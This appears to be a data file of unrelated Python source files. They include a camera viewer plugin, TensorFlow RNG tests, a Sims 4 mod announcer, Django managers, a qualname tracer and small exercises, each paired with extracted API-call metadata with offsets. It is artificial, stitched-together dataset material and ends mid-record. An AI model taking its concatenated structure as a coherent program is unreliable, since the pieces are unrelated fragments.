[((240, 326), 'odoo.fields.One2many', 'fields.One2many', (['"""survey.user_input"""', '"""slide_partner_id"""', '"""Certification attempts"""'], {}), "('survey.user_input', 'slide_partner_id',\n 'Certification attempts')\n", (255, 326), False, 'from odoo import api, fields, models\n'), ((349, 450), 'odoo.fields.Boolean', 'fields.Boolean', (['"""Certification Quizz Passed"""'], {'compute': '"""_compute_survey_quizz_passed"""', 'store': '(True)'}), "('Certification Quizz Passed', compute=\n '_compute_survey_quizz_passed', store=True)\n", (363, 450), False, 'from odoo import api, fields, models\n'), ((452, 508), 'odoo.api.depends', 'api.depends', (['"""partner_id"""', '"""user_input_ids.quizz_passed"""'], {}), "('partner_id', 'user_input_ids.quizz_passed')\n", (463, 508), False, 'from odoo import api, fields, models\n'), ((1462, 1530), 'odoo.fields.Selection', 'fields.Selection', ([], {'selection_add': "[('certification', 'Certification')]"}), "(selection_add=[('certification', 'Certification')])\n", (1478, 1530), False, 'from odoo import api, fields, models\n'), ((1547, 1596), 'odoo.fields.Many2one', 'fields.Many2one', (['"""survey.survey"""', '"""Certification"""'], {}), "('survey.survey', 'Certification')\n", (1562, 1596), False, 'from odoo import api, fields, models\n'), ((1621, 1718), 'odoo.fields.Integer', 'fields.Integer', (['"""Number of Certifications"""'], {'compute': '"""_compute_slides_statistics"""', 'store': '(True)'}), "('Number of Certifications', compute=\n '_compute_slides_statistics', store=True)\n", (1635, 1718), False, 'from odoo import api, fields, models\n'), ((2064, 2089), 'odoo.api.onchange', 'api.onchange', (['"""survey_id"""'], {}), "('survey_id')\n", (2076, 2089), False, 'from odoo import api, fields, models\n')]
|
from random import randint
from time import sleep
def sorteia(lst):
print('Sorteando 5 valores da lista: ', end='')
for i in range(0, 5):
num = randint(1, 10)
lst.append(num)
print(num, end=' ')
sleep(0.5)
print('PRONTO!')
def somaPar(lst):
soma = 0
for i in lst:
if i % 2 == 0:
soma += i
print(f'Somando os valores pares de {lst}, temos {soma}')
numeros = list()
sorteia(numeros)
somaPar(numeros)
|
[
"random.randint",
"time.sleep"
] |
[((161, 175), 'random.randint', 'randint', (['(1)', '(10)'], {}), '(1, 10)\n', (168, 175), False, 'from random import randint\n'), ((236, 246), 'time.sleep', 'sleep', (['(0.5)'], {}), '(0.5)\n', (241, 246), False, 'from time import sleep\n')]
|
#! python
# -*- coding: utf-8 -*-
## import time
import wx
import cv2
import numpy as np
from mwx.controls import Param, LParam
from mwx.controls import ToggleButton, Choice
from mwx.graphman import Layer, Thread
import editor as edi
class Plugin(Layer):
"""Plugins of camera viewer
"""
menu = "Cameras"
menustr = "Camera &viewer"
camerasys = property(lambda self: self.camera_selector.value)
cameraman = property(lambda self: self.parent.require(self.camerasys))
def Init(self):
self.viewer = Thread(self)
self.button = ToggleButton(self, "View camera", icon='cam',
handler=lambda v: self.viewer.Start(self.run)
if v.IsChecked() else self.viewer.Stop())
self.rate_param = LParam('rate', (100,500,100), 500, tip="refresh speed [ms] (>= 100ms)")
self.size_param = Param('size', (128,256,512,1024), 512, tip="resizing view window (<= 1k)")
self.camera_selector = Choice(self,
choices=['JeolCamera', 'RigakuCamera'], readonly=1)
self.layout((
self.button,
),
)
self.layout((
self.rate_param,
self.size_param,
self.camera_selector,
),
title="Setting",
row=1, show=0, type='vspin', lw=40, tw=40, cw=-1
)
def init_session(self, session):
self.rate_param.value = session.get('rate')
self.size_param.value = session.get('size')
self.camera_selector.value = session.get('camera')
def save_session(self, session):
session.update({
'rate': self.rate_param.value,
'size': self.size_param.value,
'camera': self.camera_selector.value,
})
def Destroy(self):
if self.viewer.is_active:
self.viewer.Stop()
return Layer.Destroy(self)
def run(self):
try:
title = self.__module__
if not self.cameraman:
print(self.message("- Camera manager is not selected."))
return
while self.viewer.is_active:
src = edi.imconv(self.cameraman.capture())
h, w = src.shape
H = self.size_param.value
W = H * w // h
dst = cv2.resize(src, (W, H), interpolation=cv2.INTER_AREA)
## dst = cv2.cvtColor(dst, cv2.COLOR_GRAY2BGR)
## 照準サークルを xor で足し合わせる
if 1:
## lines and circles with color:cyan #00c0c0
## c = (192,192,0)
c = 255
cx, cy = W//2, H//2
buf = np.zeros((H, W), dtype=dst.dtype)
## buf = np.resize(0, (H, W)).astype(dst.dtype)
cv2.line(buf, (0, cy), (W, cy), c, 1)
cv2.line(buf, (cx, 0), (cx, H), c, 1)
cv2.circle(buf, (cx, cy), cx//2, c, 1)
cv2.circle(buf, (cx, cy), cx//4, c, 1)
dst = cv2.bitwise_xor(buf, dst)
cv2.imshow(title, dst)
cv2.waitKey(self.rate_param.value)
if cv2.getWindowProperty(title, 0) < 0:
self.button.Value = False
self.viewer.Stop()
break
finally:
cv2.destroyAllWindows()
if __name__ == '__main__':
from plugins import JeolCamera, RigakuCamera
from mwx.graphman import Frame
app = wx.App()
frm = Frame(None)
frm.load_plug(__file__, show=1)
frm.load_plug(JeolCamera, show=0)
frm.load_plug(RigakuCamera, show=0)
frm.Show()
app.MainLoop()
|
[
"cv2.line",
"cv2.circle",
"cv2.bitwise_xor",
"mwx.controls.Param",
"cv2.destroyAllWindows",
"mwx.graphman.Frame",
"cv2.waitKey",
"cv2.imshow",
"mwx.controls.Choice",
"numpy.zeros",
"mwx.graphman.Layer.Destroy",
"wx.App",
"mwx.controls.LParam",
"mwx.graphman.Thread",
"cv2.getWindowProperty",
"cv2.resize"
] |
[((3655, 3663), 'wx.App', 'wx.App', ([], {}), '()\n', (3661, 3663), False, 'import wx\n'), ((3674, 3685), 'mwx.graphman.Frame', 'Frame', (['None'], {}), '(None)\n', (3679, 3685), False, 'from mwx.graphman import Frame\n'), ((542, 554), 'mwx.graphman.Thread', 'Thread', (['self'], {}), '(self)\n', (548, 554), False, 'from mwx.graphman import Layer, Thread\n'), ((791, 864), 'mwx.controls.LParam', 'LParam', (['"""rate"""', '(100, 500, 100)', '(500)'], {'tip': '"""refresh speed [ms] (>= 100ms)"""'}), "('rate', (100, 500, 100), 500, tip='refresh speed [ms] (>= 100ms)')\n", (797, 864), False, 'from mwx.controls import Param, LParam\n'), ((889, 966), 'mwx.controls.Param', 'Param', (['"""size"""', '(128, 256, 512, 1024)', '(512)'], {'tip': '"""resizing view window (<= 1k)"""'}), "('size', (128, 256, 512, 1024), 512, tip='resizing view window (<= 1k)')\n", (894, 966), False, 'from mwx.controls import Param, LParam\n'), ((1004, 1068), 'mwx.controls.Choice', 'Choice', (['self'], {'choices': "['JeolCamera', 'RigakuCamera']", 'readonly': '(1)'}), "(self, choices=['JeolCamera', 'RigakuCamera'], readonly=1)\n", (1010, 1068), False, 'from mwx.controls import ToggleButton, Choice\n'), ((1936, 1955), 'mwx.graphman.Layer.Destroy', 'Layer.Destroy', (['self'], {}), '(self)\n', (1949, 1955), False, 'from mwx.graphman import Layer, Thread\n'), ((3503, 3526), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (3524, 3526), False, 'import cv2\n'), ((2401, 2454), 'cv2.resize', 'cv2.resize', (['src', '(W, H)'], {'interpolation': 'cv2.INTER_AREA'}), '(src, (W, H), interpolation=cv2.INTER_AREA)\n', (2411, 2454), False, 'import cv2\n'), ((3216, 3238), 'cv2.imshow', 'cv2.imshow', (['title', 'dst'], {}), '(title, dst)\n', (3226, 3238), False, 'import cv2\n'), ((3255, 3289), 'cv2.waitKey', 'cv2.waitKey', (['self.rate_param.value'], {}), '(self.rate_param.value)\n', (3266, 3289), False, 'import cv2\n'), ((2795, 2828), 'numpy.zeros', 'np.zeros', (['(H, W)'], {'dtype': 'dst.dtype'}), '((H, W), dtype=dst.dtype)\n', (2803, 2828), True, 'import numpy as np\n'), ((2917, 2954), 'cv2.line', 'cv2.line', (['buf', '(0, cy)', '(W, cy)', 'c', '(1)'], {}), '(buf, (0, cy), (W, cy), c, 1)\n', (2925, 2954), False, 'import cv2\n'), ((2975, 3012), 'cv2.line', 'cv2.line', (['buf', '(cx, 0)', '(cx, H)', 'c', '(1)'], {}), '(buf, (cx, 0), (cx, H), c, 1)\n', (2983, 3012), False, 'import cv2\n'), ((3033, 3073), 'cv2.circle', 'cv2.circle', (['buf', '(cx, cy)', '(cx // 2)', 'c', '(1)'], {}), '(buf, (cx, cy), cx // 2, c, 1)\n', (3043, 3073), False, 'import cv2\n'), ((3092, 3132), 'cv2.circle', 'cv2.circle', (['buf', '(cx, cy)', '(cx // 4)', 'c', '(1)'], {}), '(buf, (cx, cy), cx // 4, c, 1)\n', (3102, 3132), False, 'import cv2\n'), ((3157, 3182), 'cv2.bitwise_xor', 'cv2.bitwise_xor', (['buf', 'dst'], {}), '(buf, dst)\n', (3172, 3182), False, 'import cv2\n'), ((3326, 3357), 'cv2.getWindowProperty', 'cv2.getWindowProperty', (['title', '(0)'], {}), '(title, 0)\n', (3347, 3357), False, 'import cv2\n')]
|
def test_ipython():
print('DATA FILE IS AVAILABLE ON drp-ued-cmp001 ONLY')
#from psana.pyalgos.generic.NDArrUtils import info_ndarr
from psana import DataSource
ds = DataSource(files='/u2/pcds/pds/ued/ueddaq02/xtc/ueddaq02-r0028-s000-c000.xtc2')
run = next(ds.runs())
det = run.Detector('epixquad')
step = next(run.steps())
evt = next(step.events())
v = det.step.value(evt)
d = det.step.docstring(evt)
detsd = run.Detector('step_docstring') #Out[6]: <psana.detector.envstore.scan_raw_2_0_0 at 0x7f1a24735c10>
detsv = run.Detector('step_value') #Out[8]: <psana.detector.envstore.scan_raw_2_0_0 at 0x7f1a0b205c10>
from psana import DataSource
ds = DataSource(exp='tmoc00118', run=123, max_events=100)
run = next(ds.runs())
det = run.Detector('tmoopal')
print('run.dsparms.det_classes dict content:\n %s' % str(run.dsparms.det_classes))
run = None
evt = None
from psana import DataSource
ds = DataSource(exp='ascdaq18', run=24, max_events=100)
print('ds.xtc_files:\n ', '\n '.join(ds.xtc_files))
for irun,run in enumerate(ds.runs()):
print('\n==== %02d run: %d exp: %s detnames: %s' % (irun, run.runnum, run.expt, ','.join(run.detnames)))
det = run.Detector('epixhr')
print('det.raw._fullname :', det.raw._fullname())
for istep,step in enumerate(run.steps()):
print('\nStep %02d' % istep, type(step), end='')
for ievt,evt in enumerate(step.events()):
if ievt>10: continue #exit('exit by number of events limit %d' % args.evtmax)
print('\n Event %02d' % (ievt))
st = evt.run().step(evt)
print('XXX dir(st):', dir(st))
|
[
"psana.DataSource"
] |
[((185, 264), 'psana.DataSource', 'DataSource', ([], {'files': '"""/u2/pcds/pds/ued/ueddaq02/xtc/ueddaq02-r0028-s000-c000.xtc2"""'}), "(files='/u2/pcds/pds/ued/ueddaq02/xtc/ueddaq02-r0028-s000-c000.xtc2')\n", (195, 264), False, 'from psana import DataSource\n'), ((710, 762), 'psana.DataSource', 'DataSource', ([], {'exp': '"""tmoc00118"""', 'run': '(123)', 'max_events': '(100)'}), "(exp='tmoc00118', run=123, max_events=100)\n", (720, 762), False, 'from psana import DataSource\n'), ((986, 1036), 'psana.DataSource', 'DataSource', ([], {'exp': '"""ascdaq18"""', 'run': '(24)', 'max_events': '(100)'}), "(exp='ascdaq18', run=24, max_events=100)\n", (996, 1036), False, 'from psana import DataSource\n')]
|
from __future__ import annotations
import typing
import clock
import zone
from NeonOcean.S4.Main import Mods, This
from NeonOcean.S4.Main.Tools import Exceptions
from protocolbuffers import FileSerialization_pb2
from server import client as clientModule
from sims4 import service_manager
from sims4.tuning import instance_manager
_announcers = list() # type: typing.List[typing.Type[Announcer]]
class Announcer:
Host = This.Mod # type: Mods.Mod
Enabled = True # type: bool
Reliable = False # type: bool # Whether the announcer will be called if the host is disabled.
Preemptive = False # type: bool # Whether the annoucnment methods are called before or after the function they are announcing.
_priority = 0 # type: float # Higher priority announcers will run before lower priority ones.
def __init_subclass__ (cls, **kwargs):
SetupAnnouncer(cls)
@classmethod
def GetPriority (cls) -> float:
return cls._priority
@classmethod
def SetPriority (cls, value) -> None:
cls._priority = value
_SortAnnouncer()
@classmethod
def InstanceManagerOnStart (cls, instanceManager: instance_manager.InstanceManager) -> None:
pass
@classmethod
def InstanceManagerLoadDataIntoClassInstances (cls, instanceManager: instance_manager.InstanceManager) -> None:
pass
@classmethod
def InstanceManagerOnStop (cls, instanceManager: instance_manager.InstanceManager) -> None:
pass
@classmethod
def OnLoadingScreenAnimationFinished (cls, zoneReference: zone.Zone) -> None:
pass
@classmethod
def OnClientConnect (cls, clientReference: clientModule.Client) -> None:
pass
@classmethod
def OnClientDisconnect (cls, clientReference: clientModule.Client) -> None:
pass
@classmethod
def OnEnterMainMenu (cls) -> None:
pass
@classmethod
def ZoneLoad (cls, zoneReference: zone.Zone) -> None:
pass
@classmethod
def ZoneSave (cls, zoneReference: zone.Zone, saveSlotData: typing.Optional[FileSerialization_pb2.SaveSlotData] = None) -> None:
pass
@classmethod
def ZoneStartServices (cls, zoneReference: zone.Zone, gameplayZoneData: FileSerialization_pb2.GameplayData, saveSlotData: FileSerialization_pb2.SaveSlotData) -> None:
pass
@classmethod
def ZoneOnToreDown (cls, zoneReference: zone.Zone, clientReference: clientModule.Client) -> None:
pass
@classmethod
def ZoneUpdate (cls, zoneReference: zone.Zone, absoluteTicks: int) -> None:
pass
@classmethod
def ServiceManagerOnZoneLoad (cls, zoneManager: service_manager.ServiceManager) -> None:
pass
@classmethod
def ServiceManagerOnZoneUnload (cls, zoneManager: service_manager.ServiceManager) -> None:
pass
@classmethod
def GameClockTickGameClock (cls, gameClock: clock.GameClock, absoluteTicks: int) -> None:
pass
def GetAllAnnouncers () -> typing.List[typing.Type[Announcer]]:
return list(_announcers)
def SetupAnnouncer (announcer: typing.Type[Announcer]) -> None:
if not isinstance(announcer, type):
raise Exceptions.IncorrectTypeException(announcer, "announcer", (type,))
if not issubclass(announcer, Announcer):
raise Exceptions.DoesNotInheritException("announcer", (Announcer,))
if announcer in _announcers:
return
_Register(announcer)
_SortAnnouncer()
def _Register (announcer: typing.Type[Announcer]) -> None:
if not announcer in _announcers:
_announcers.append(announcer)
def _SortAnnouncer () -> None:
global _announcers
announcersCopy = _announcers.copy() # type: typing.List[typing.Type[Announcer]]
sortedAnnouncers = list()
for loopCount in range(len(announcersCopy)): # type: int
targetIndex = None # type: typing.Optional[int]
for currentIndex in range(len(announcersCopy)):
if targetIndex is None:
targetIndex = currentIndex
continue
if -announcersCopy[currentIndex].GetPriority() != -announcersCopy[targetIndex].GetPriority():
if -announcersCopy[currentIndex].GetPriority() < -announcersCopy[targetIndex].GetPriority():
targetIndex = currentIndex
continue
else:
if announcersCopy[currentIndex].__module__ < announcersCopy[targetIndex].__module__:
targetIndex = currentIndex
continue
sortedAnnouncers.append(announcersCopy[targetIndex])
announcersCopy.pop(targetIndex)
_announcers = sortedAnnouncers
|
[
"NeonOcean.S4.Main.Tools.Exceptions.DoesNotInheritException",
"NeonOcean.S4.Main.Tools.Exceptions.IncorrectTypeException"
] |
[((2936, 3002), 'NeonOcean.S4.Main.Tools.Exceptions.IncorrectTypeException', 'Exceptions.IncorrectTypeException', (['announcer', '"""announcer"""', '(type,)'], {}), "(announcer, 'announcer', (type,))\n", (2969, 3002), False, 'from NeonOcean.S4.Main.Tools import Exceptions\n'), ((3054, 3115), 'NeonOcean.S4.Main.Tools.Exceptions.DoesNotInheritException', 'Exceptions.DoesNotInheritException', (['"""announcer"""', '(Announcer,)'], {}), "('announcer', (Announcer,))\n", (3088, 3115), False, 'from NeonOcean.S4.Main.Tools import Exceptions\n')]
|
from django.db import models
class BaseManagerModel(models.Model):
@classmethod
def create(cls):
return cls.objects.create()
class TestManager(models.Manager):
def get_queryset(self):
return super(TestManager, self).get_queryset().none()
class RenameManagerModel(models.Model):
instances = models.Manager()
@classmethod
def create(cls):
return cls.instances.create()
class ReplaceManagerModel(models.Model):
objects = TestManager()
@classmethod
def create(cls):
return cls.objects.create()
class MultipleManagerModel(models.Model):
objects = models.Manager()
instances = TestManager()
@classmethod
def create(cls):
return cls.objects.create()
|
[
"django.db.models.Manager"
] |
[((328, 344), 'django.db.models.Manager', 'models.Manager', ([], {}), '()\n', (342, 344), False, 'from django.db import models\n'), ((626, 642), 'django.db.models.Manager', 'models.Manager', ([], {}), '()\n', (640, 642), False, 'from django.db import models\n')]
|
from __future__ import print_function
import tensorflow as tf
import numpy as np
import pytest
import sys
from tensorflow.python.ops import array_ops
shapes = [
(3, 4),
(50, 70, 12)
]
seed = 123
def _test_random_func(func_name, shape):
print('func_name', func_name)
func = eval(func_name)
with tf.Graph().as_default():
with tf.device('/cpu:0'):
W_t = tf.Variable(func(shape, seed=seed))
with tf.Session(config=tf.ConfigProto(log_device_placement=False)) as sess:
sess.run(tf.initialize_all_variables())
W_cpu = sess.run(W_t)
with tf.device('/gpu:0'):
W_t = tf.Variable(func(shape, seed=seed))
with tf.Session(config=tf.ConfigProto(log_device_placement=False)) as sess:
sess.run(tf.initialize_all_variables())
W_gpu = sess.run(W_t)
if np.prod(np.array(shape)) < 20:
print('W_cpu', W_cpu)
print('W_gpu', W_gpu)
else:
print('W_cpu.reshape(-1)[:20]', W_cpu.reshape(-1)[:20])
print('W_gpu.reshape(-1)[:20]', W_gpu.reshape(-1)[:20])
assert np.all(np.abs(W_cpu - W_gpu) < 1e-4)
@pytest.mark.parametrize(
'shape',
shapes)
def test_random_normal(shape):
_test_random_func('tf.random_normal', shape)
@pytest.mark.parametrize(
'shape',
shapes)
def test_random_uniform(shape):
_test_random_func('tf.random_uniform', shape)
@pytest.mark.parametrize(
'shape',
shapes)
@pytest.mark.skip(reason='Causes abort currently')
def test_truncated_normal(shape):
_test_random_func('tf.truncated_normal', shape)
if __name__ == '__main__':
if len(sys.argv) == 1:
print('Please run using py.test')
else:
eval('%s((3, 4))' % sys.argv[1])
|
[
"numpy.abs",
"tensorflow.device",
"tensorflow.ConfigProto",
"numpy.array",
"tensorflow.initialize_all_variables",
"tensorflow.Graph",
"pytest.mark.parametrize",
"pytest.mark.skip"
] |
[((1229, 1269), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""shape"""', 'shapes'], {}), "('shape', shapes)\n", (1252, 1269), False, 'import pytest\n'), ((1362, 1402), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""shape"""', 'shapes'], {}), "('shape', shapes)\n", (1385, 1402), False, 'import pytest\n'), ((1497, 1537), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""shape"""', 'shapes'], {}), "('shape', shapes)\n", (1520, 1537), False, 'import pytest\n'), ((1548, 1597), 'pytest.mark.skip', 'pytest.mark.skip', ([], {'reason': '"""Causes abort currently"""'}), "(reason='Causes abort currently')\n", (1564, 1597), False, 'import pytest\n'), ((357, 376), 'tensorflow.device', 'tf.device', (['"""/cpu:0"""'], {}), "('/cpu:0')\n", (366, 376), True, 'import tensorflow as tf\n'), ((628, 647), 'tensorflow.device', 'tf.device', (['"""/gpu:0"""'], {}), "('/gpu:0')\n", (637, 647), True, 'import tensorflow as tf\n'), ((319, 329), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (327, 329), True, 'import tensorflow as tf\n'), ((546, 575), 'tensorflow.initialize_all_variables', 'tf.initialize_all_variables', ([], {}), '()\n', (573, 575), True, 'import tensorflow as tf\n'), ((817, 846), 'tensorflow.initialize_all_variables', 'tf.initialize_all_variables', ([], {}), '()\n', (844, 846), True, 'import tensorflow as tf\n'), ((909, 924), 'numpy.array', 'np.array', (['shape'], {}), '(shape)\n', (917, 924), True, 'import numpy as np\n'), ((1196, 1217), 'numpy.abs', 'np.abs', (['(W_cpu - W_gpu)'], {}), '(W_cpu - W_gpu)\n', (1202, 1217), True, 'import numpy as np\n'), ((468, 510), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {'log_device_placement': '(False)'}), '(log_device_placement=False)\n', (482, 510), True, 'import tensorflow as tf\n'), ((739, 781), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {'log_device_placement': '(False)'}), '(log_device_placement=False)\n', (753, 781), True, 'import tensorflow as tf\n')]
|
from sendgrid_backend.signals import sendgrid_email_sent
from django_sendgrid_tracking.mail import create_send_email
sendgrid_email_sent.connect(create_send_email)
|
[
"sendgrid_backend.signals.sendgrid_email_sent.connect"
] |
[((119, 165), 'sendgrid_backend.signals.sendgrid_email_sent.connect', 'sendgrid_email_sent.connect', (['create_send_email'], {}), '(create_send_email)\n', (146, 165), False, 'from sendgrid_backend.signals import sendgrid_email_sent\n')]
|
import os
import tempfile
from aquascope.webserver.data_access.conversions import list_of_item_dicts_to_tsv
from aquascope.webserver.data_access.storage.export import upload_export_file
def export_items(items, storage_client):
with tempfile.TemporaryDirectory() as tmpdirname:
local_filepath = os.path.join(tmpdirname, 'features.tsv')
list_of_item_dicts_to_tsv(items, local_filepath)
return upload_export_file(storage_client, local_filepath)
|
[
"aquascope.webserver.data_access.storage.export.upload_export_file",
"tempfile.TemporaryDirectory",
"os.path.join",
"aquascope.webserver.data_access.conversions.list_of_item_dicts_to_tsv"
] |
[((239, 268), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], {}), '()\n', (266, 268), False, 'import tempfile\n'), ((309, 349), 'os.path.join', 'os.path.join', (['tmpdirname', '"""features.tsv"""'], {}), "(tmpdirname, 'features.tsv')\n", (321, 349), False, 'import os\n'), ((358, 406), 'aquascope.webserver.data_access.conversions.list_of_item_dicts_to_tsv', 'list_of_item_dicts_to_tsv', (['items', 'local_filepath'], {}), '(items, local_filepath)\n', (383, 406), False, 'from aquascope.webserver.data_access.conversions import list_of_item_dicts_to_tsv\n'), ((422, 472), 'aquascope.webserver.data_access.storage.export.upload_export_file', 'upload_export_file', (['storage_client', 'local_filepath'], {}), '(storage_client, local_filepath)\n', (440, 472), False, 'from aquascope.webserver.data_access.storage.export import upload_export_file\n')]
|
import sys
import os
import string
class BackwardsReader:
""" Stripped and stolen from : http://code.activestate.com/recipes/120686-read-a-text-file-backwards/ """
def readline(self):
while len(self.data) == 1 and ((self.blkcount * self.blksize) < self.size):
self.blkcount = self.blkcount + 1
line = self.data[0]
try:
self.f.seek(-self.blksize * self.blkcount, 2)
self.data = string.split(self.f.read(self.blksize) + line, '\n')
except IOError:
self.f.seek(0)
self.data = string.split(self.f.read(self.size - (self.blksize * (self.blkcount-1))) + line, '\n')
if len(self.data) == 0:
return ""
line = self.data[-1]
self.data = self.data[:-1]
return line + '\n'
def __init__(self, file, blksize=4096):
"""initialize the internal structures"""
self.size = os.stat(file)[6]
self.blksize = blksize
self.blkcount = 1
self.f = open(file, 'rb')
if self.size > self.blksize:
self.f.seek(-self.blksize * self.blkcount, 2)
self.data = string.split(self.f.read(self.blksize), '\n')
if not self.data[-1]:
self.data = self.data[:-1]
|
[
"os.stat"
] |
[((857, 870), 'os.stat', 'os.stat', (['file'], {}), '(file)\n', (864, 870), False, 'import os\n')]
|
from random import choice
from time import sleep
print('Vamos jogar \033[32mJokenpô\033[m')
escolhas = ['pedra', 'papel', 'tesoura']
computador = choice(escolhas)
jogador = str(input('Já escolhi a minha opção, qual a sua jogador \033[34mdesafiante\033[m: ')).strip().lower()
while not (jogador in escolhas):
jogador = str(input('opção invalida, por favor digite outra: ')).strip().lower()
print('Jogada contabilizada, hora de saber o vencedor')
sleep(1.5)
print('\033[34mJo\033[m...')
sleep(1)
print('\033[34mKen\033[m...')
sleep(1)
print('\033[34mPô\033[m!!!')
sleep(2)
print('\033[1;31mComputador\033[m: \033[1;35m{}\033[m'.format(computador))
print('\033[1;32mJogador\033[m: \033[1;36m{}\033[m'.format(jogador))
if computador == jogador:
print('\033[1;33mEMPATE\033[m')
elif computador == 'pedra':
if jogador == 'tesoura':
print('Vitória do \033[1;31mCOMPUTADOR\033[m')
else:
print('Vitória do \033[1;34mJOGADOR DESAFIANTE\033[m')
elif computador == 'papel':
if jogador == 'tesoura':
print('Vitória do \033[1;34mJOGADOR DESAFIANTE\033[m')
else:
print('Vitória do \033[1;31mCOMPUTADOR\033[m')
elif computador == 'tesoura':
if jogador == 'pedra':
print('Vitória do \033[1;34mJOGADOR DESAFIANTE\033[m')
else:
print('Vitória do \033[31mCOMPUTADOR\033[m')
|
[
"random.choice",
"time.sleep"
] |
[((147, 163), 'random.choice', 'choice', (['escolhas'], {}), '(escolhas)\n', (153, 163), False, 'from random import choice\n'), ((450, 460), 'time.sleep', 'sleep', (['(1.5)'], {}), '(1.5)\n', (455, 460), False, 'from time import sleep\n'), ((490, 498), 'time.sleep', 'sleep', (['(1)'], {}), '(1)\n', (495, 498), False, 'from time import sleep\n'), ((529, 537), 'time.sleep', 'sleep', (['(1)'], {}), '(1)\n', (534, 537), False, 'from time import sleep\n'), ((567, 575), 'time.sleep', 'sleep', (['(2)'], {}), '(2)\n', (572, 575), False, 'from time import sleep\n')]
|
from __future__ import print_function
import inspect
import ast
import sys
import collections
import weakref
def qualname(obj):
"""
Lookup or compute the ``__qualname__`` of ``obj``
:param obj: class or function to lookup
:return: ``__qualname__`` of ``obj``
:rtype: str
:raises: AttributeError if no ``__qualname__`` can be found
"""
# only compute qualname if not present already
try:
return obj.__qualname__
except AttributeError as err:
no_qualname_exception = err
obj = getattr(obj, '__func__', obj)
# inspect source to retrace definition
source, line_no = inspect.findsource(obj)
try:
__qualname__ = QNameTracer(''.join(source)).at_line_no(line_no)
except KeyError as err:
no_qualname_exception.__context__ = err
raise no_qualname_exception
return __qualname__
def get_qualname(module, line_no):
"""
Return the qualname corresponding to a definition
Parses the abstract syntax tree to reconstruct the name of scopes.
A qualname is defined at the beginning of a scope - a ``class`` or
``def`` statement.
:param module: name of the module in which the definition is performed
:param line_no: line number at which the definition is performed
:return: qualname at ``line_no`` of ``module``
:raises: KeyError if ``module`` or ``line_no`` do not point to valid definitions
"""
module = sys.modules[module]
source, _ = inspect.findsource(module)
return QNameTracer(''.join(source)).at_line_no(line_no)
class QNameTracer(ast.NodeVisitor):
_cache = weakref.WeakValueDictionary()
_cache_fifo = collections.deque(maxlen=10) # limit cache to 10 elements
_init = False
def __new__(cls, source):
try:
return cls._cache[source]
except KeyError:
self = ast.NodeVisitor.__new__(cls)
cls._cache[source] = self
cls._cache_fifo.append(self)
return self
def __init__(self, source):
if self._init:
return
ast.NodeVisitor.__init__(self)
self._name_stack = []
self._lno_qualname = {}
self.visit(ast.parse(source=source))
self._init = True
def at_line_no(self, line_no):
return self._lno_qualname[line_no]
def _set_qualname(self, ast_line_no, push_qualname=None):
# ast_line_no starts at 1, inspect line_no starts at 0
line_no = ast_line_no
name_stack = self._name_stack + ([push_qualname] if push_qualname is not None else [])
self._lno_qualname[line_no] = '.'.join(name_stack)
def visit_FunctionDef(self, node):
# enter scope
self._name_stack.append(node.name)
self._set_qualname(node.lineno)
# proceed in function local namespace
self._name_stack.append('<locals>')
self.generic_visit(node)
# unwind at exit
self._name_stack.pop()
self._name_stack.pop()
def visit_ClassDef(self, node):
# enter scope
self._name_stack.append(node.name)
self._set_qualname(node.lineno)
# proceed at same scope
self.generic_visit(node)
# unwind at exit
self._name_stack.pop()
def visit_Exec(self, node):
try:
qnames = self.__class__(node.body.s)
except SyntaxError:
return
for ast_line_no, exec_qualname in qnames._lno_qualname.items():
self._set_qualname(node.lineno + ast_line_no, push_qualname=exec_qualname)
|
[
"ast.NodeVisitor.__init__",
"ast.NodeVisitor.__new__",
"inspect.findsource",
"ast.parse",
"collections.deque",
"weakref.WeakValueDictionary"
] |
[((633, 656), 'inspect.findsource', 'inspect.findsource', (['obj'], {}), '(obj)\n', (651, 656), False, 'import inspect\n'), ((1477, 1503), 'inspect.findsource', 'inspect.findsource', (['module'], {}), '(module)\n', (1495, 1503), False, 'import inspect\n'), ((1615, 1644), 'weakref.WeakValueDictionary', 'weakref.WeakValueDictionary', ([], {}), '()\n', (1642, 1644), False, 'import weakref\n'), ((1663, 1691), 'collections.deque', 'collections.deque', ([], {'maxlen': '(10)'}), '(maxlen=10)\n', (1680, 1691), False, 'import collections\n'), ((2081, 2111), 'ast.NodeVisitor.__init__', 'ast.NodeVisitor.__init__', (['self'], {}), '(self)\n', (2105, 2111), False, 'import ast\n'), ((2193, 2217), 'ast.parse', 'ast.parse', ([], {'source': 'source'}), '(source=source)\n', (2202, 2217), False, 'import ast\n'), ((1866, 1894), 'ast.NodeVisitor.__new__', 'ast.NodeVisitor.__new__', (['cls'], {}), '(cls)\n', (1889, 1894), False, 'import ast\n')]
|
"""The module demonstrates using threaded binary trees to implement ordered index."""
from typing import Any
from forest.binary_trees import single_threaded_binary_trees
from forest.binary_trees import traversal
class MyDatabase:
"""Example using threaded binary trees to build index."""
def __init__(self) -> None:
self._left_bst = single_threaded_binary_trees.LeftThreadedBinaryTree()
self._right_bst = single_threaded_binary_trees.RightThreadedBinaryTree()
def _persist(self, payload: Any) -> str:
"""Fake function pretent storing data to file system.
Returns
-------
str
Path to the payload.
"""
return f"path_to_{payload}"
def insert_data(self, key: Any, payload: Any) -> None:
"""Insert data.
Parameters
----------
key: Any
Unique key for the payload
payload: Any
Any data
"""
path = self._persist(payload=payload)
self._left_bst.insert(key=key, data=path)
self._right_bst.insert(key=key, data=path)
def dump(self, ascending: bool = True) -> traversal.Pairs:
"""Dump the data.
Parameters
----------
ascending: bool
The order of data.
Yields
------
`Pairs`
The next (key, data) pair.
"""
if ascending:
return self._right_bst.inorder_traverse()
else:
return self._left_bst.reverse_inorder_traverse()
if __name__ == "__main__":
# Initialize the database.
my_database = MyDatabase()
# Add some items.
my_database.insert_data("Adam", "adam_data")
my_database.insert_data("Bob", "bob_data")
my_database.insert_data("Peter", "peter_data")
my_database.insert_data("David", "david_data")
# Dump the items in ascending order.
print("Ascending...")
for contact in my_database.dump():
print(contact)
print("\nDescending...")
# Dump the data in decending order.
for contact in my_database.dump(ascending=False):
print(contact)
|
[
